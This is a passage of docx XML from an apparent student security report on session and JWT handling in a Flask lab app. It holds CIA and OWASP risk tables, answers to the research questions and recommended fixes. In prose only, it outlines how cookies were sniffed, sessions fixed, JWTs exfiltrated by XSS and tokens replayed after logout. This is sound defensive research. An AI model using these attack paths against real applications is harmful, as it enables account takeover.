              <w:t xml:space="preserve">An intercepted session ID gives the attacker full account access (C=HIGH). With a valid session the attacker can perform any action the user can (I=HIGH). The attack does not disrupt service (A=LOW).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S2 — Session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826"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2700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-fixation the attacker is fully authenticated as the victim (C=HIGH, I=HIGH). The victim’s session continues normally (A=LOW), though unexpected simultaneous access may be noticed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S3 — XSS token theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826"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2700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">The exfiltrated JWT grants access to all jwt_required endpoints including /api/me and /api/notes (C=HIGH). The attacker can call any authenticated endpoint (I=HIGH). The XSS payload could secondarily deface the page but primary impact is token theft.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1100" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S4 — Broken logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1826"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2700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A captured token that remains valid after logout allows persistent, silent account access (C=HIGH, I=HIGH). Particularly dangerous in combination with S3 — the stolen token in tokens.log would remain usable for the full one-hour expiry. Availability unaffected (A=LOW).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Across all four scenarios, confidentiality and integrity are HIGH in the INSECURE profile because every vulnerability results in a fully authenticated session or token. Availability is consistently LOW as none of the attacks causes denial of service by itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Risk analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The risk analysis applies the OWASP Risk Rating methodology (qualitative likelihood × impact). The table shows the risk level in both profiles.</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200"/>
        <w:gridCol w:w="1313"/>
        <w:gridCol w:w="1313"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Likelihood (INSECURE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact (INSECURE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk (INSECURE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk (SECURE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="1F3A68"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S1 — Missing cookie flags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313"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1800" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A07:2021 / ASVS 3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S2 — Session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313"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1800" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A07:2021 / ASVS 3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S3 — XSS + localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A03:2021 / ASVS 3.5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">S4 — Broken logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1313"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VERY LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="EEF3FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">A07:2021 / ASVS 3.5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Likelihood rationale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S1 and S2 are Medium: they require a network-adjacent attacker or a crafted-URL click. S3 is High because the XSS sink is present and the payload is a single line of JavaScript. S4 is Medium because it requires a prior token capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact rationale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All four scenarios carry High technical impact because they produce full account takeover. Business impact is High for any application where user data or transactions are exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Risk in SECURE profile.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All risks drop to LOW or VERY LOW. CSP, HSTS, X-Frame-Options, and X-Content-Type-Options are now applied via the security_headers hook in __init__.py. The remaining residual risk relates to deny-list persistence in a distributed environment (Redis preferable over SQLite at scale).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.5 External validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">External validation applied two DOT framework methods: Field (teacher/supervisor consultation) and Workshop (peer design review).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Teacher consultation (Field method).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The Sprint 2 design was reviewed with the project supervisor. Feedback: (1) the threat model scope and scenario selection were appropriate; (2) evidence collection should reference specific file names with consistent timestamping — applied in section 4.9; (3) the CIA analysis should address all four scenarios individually rather than as a group — reflected in section 5.3. No fundamental changes to the research approach were required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Peer design review (Workshop method).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A design review session was conducted with two fellow students specialising in cyber security. Reviewers examined the PoC architecture, attack scenario definitions, and initial comparative results. Observations: the /set endpoint is correctly gated to INSECURE mode only (routes.py returns HTTP 403 in SECURE); the tokens.log evidence was considered clear and convincing; a question was raised about whether logged tokens had been validated against the running server. A post-review verification curl confirmed that a token from the log returned HTTP 401 only after the SECURE profile revocation logic was active, confirming the S4 finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No changes to the core research design were required. The validation confirmed that scenario selection, threat model, and evidence collection were adequate. The suggestion to add per-scenario CIA entries was adopted and is reflected in section 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Sprint 4 — Final Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sprint 4 consolidates the findings from Sprints 1 through 3 into the final research report and prepares the assessment presentation. This chapter provides the definitive answers to the research questions and the formal conclusions of the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Answers to the sub-questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 1: Most common vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The library research (section 4.2.2) identified four primary vulnerability classes: missing cookie security attributes, session fixation, insecure JWT storage in localStorage, and absent server-side token revocation. All four are L1 findings in OWASP ASVS V3 and appear in OWASP Top 10 A07:2021. The proof-of-concept confirmed that all four are reproducible in a realistic application with minimal attacker capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 2: Exploitation of insecure storage and transmission.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Three exploitation paths were demonstrated. Passive network capture (tcpdump on the Docker bridge) extracted the session cookie from cleartext HTTP traffic in S1. In S3, a single-line XSS payload caused the victim browser to exfiltrate the JWT to the attacker server; the stolen tokens are logged in evidence/S3/tokens.log. In S4, a token from that log was replayed via curl against /api/me after logout and returned HTTP 200 with full account data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 3: Realistic and feasible attack scenarios.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All four scenarios were confirmed as realistic by the library research (section 4.2.4), matching each to an OWASP Testing Guide test case (OTG-SESS-002, -003, -006, -009). Lab execution confirmed feasibility: every scenario was reproduced within Docker Compose using only browser developer tools, tcpdump, and curl. No specialised exploitation tooling was required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 4: Security impact on CIA.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The CIA analysis (section 5.3) classified all four vulnerabilities as HIGH impact on confidentiality and integrity because each results in a fully authenticated session or token that the attacker can use to read and modify account data. Availability impact is LOW across all scenarios. Risk levels in the INSECURE profile range from HIGH to CRITICAL; after applying the SECURE profile controls all risks drop to LOW or VERY LOW (section 5.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sub-question 5: Most effective defensive measures.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The comparative evaluation (section 5.2) confirmed that the four OWASP-recommended baseline controls each neutralised the corresponding vulnerability completely. In order of implementation simplicity: (1) cookie security attributes — one configuration class change; (2) session.clear() on login — one line of code; (3) JWT in HttpOnly cookie instead of localStorage — one conditional branch in /api/login; (4) jti deny-list — one database lookup per request. All four controls are available in standard Python/Flask libraries with negligible performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Answer to the main research question</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Main research question: How secure is token and session handling in modern web applications, and which implementation choices create or reduce vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The research demonstrates that token and session handling in modern web applications is highly insecure by default when developers accept framework defaults without reviewing their security implications. The four vulnerability classes studied are not obscure edge cases: they appear at the top of the OWASP L1 control list and were all reproducible within a minimal proof-of-concept application by accepting typical tutorial-level defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The specific implementation choices that create vulnerability are: accepting HTTP-only transport without the Secure cookie flag; omitting session.clear() on login; storing JWTs in localStorage instead of an HttpOnly cookie; and treating logout as a client-side operation without server-side state change. Each is individually documented in published RFCs and OWASP guidance as a known risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The choices that reduce these vulnerabilities are equally well-documented and are not complex to apply. The four mitigations required no changes to application architecture, no additional dependencies, and no redesign of routes or templates. They were applied entirely through a configuration class switch and approximately ten lines of code additions. The trade-off between security and implementation complexity is therefore strongly favourable: risk drops from HIGH/CRITICAL to LOW across all scenarios while implementation cost is minimal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The main conclusion is that the security of token and session handling is determined almost entirely by a small set of deliberate configuration and design choices. The vulnerabilities studied do not require sophisticated attacks to exploit, but they also do not require sophisticated engineering to prevent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following recommendations are addressed to developers building web applications with cookie-based sessions or JWT bearer tokens, ordered by impact-to-effort ratio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">1. Set all three cookie security attributes before first deployment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SESSION_COOKIE_SECURE, SESSION_COOKIE_HTTPONLY, and SESSION_COOKIE_SAMESITE should be set in the framework configuration at project creation. In Flask this is three configuration keys. Missing any one leaves a specific, documented attack path open.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2. Call session.clear() on every login.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This single call prevents session fixation at zero architectural cost and should be a non-negotiable part of any login handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3. Store JWTs in HttpOnly cookies, not in localStorage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> An HttpOnly cookie is equally convenient from the client’s perspective (the browser sends it automatically) and is invisible to JavaScript. If cross-origin requests are required, use SameSite=None with Secure rather than abandoning the HttpOnly constraint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
